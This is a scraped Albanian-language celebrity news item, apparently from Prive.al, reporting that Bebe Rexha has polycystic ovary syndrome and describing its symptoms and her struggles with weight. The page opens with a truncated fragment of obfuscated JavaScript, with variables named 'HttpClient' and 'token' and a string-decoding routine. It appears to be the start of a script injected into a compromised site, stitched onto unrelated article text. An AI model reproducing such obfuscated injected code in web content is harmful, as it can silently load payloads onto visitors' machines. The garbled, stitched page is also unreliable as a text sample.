;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

“E bëjnë kaq të vështirë,” nga cili çrregullim po vuan Bebe Rexha?

By

Së fundmi, këngëtarja ka treguar se vuan nga sindroma e vezores policistike, e njohur ndryshe si PCOS.

Interpretuesja e hitit “I’m a mess” foli për çekuilibrin e saj të hormoneve në shfaqjen e “Gayle King SiriusXM” këtë javë, duke shpjeguar se gjendja mund të shkaktojë simptoma si cista ovariane, perioda të parregullta, puçrra fytyre, rritje të tepërt të flokëve, infertilitet dhe shtim në peshë.

Për këtë arsye, marrja e medikamenteve ia bën asaj të vështirë për të humbur peshë.

Simptomat e PCOS përfshijnë parregullsi menstruale, rritje të tepërt të flokëve, puçrra fytyre dhe shtim në peshë.

Kujtuam që Bebe Rexha shpesh është qëlluar me komente për peshën dhe trupin e saj. Ajo është përpjekur gjithmonë të shfaqet e sigurt, duke thënë se nuk i intereson aspak se çfarë mendojnë të tjerët, por e do trupin ashtu siç është. /Prive.al

 

Artikuj të ngjashëm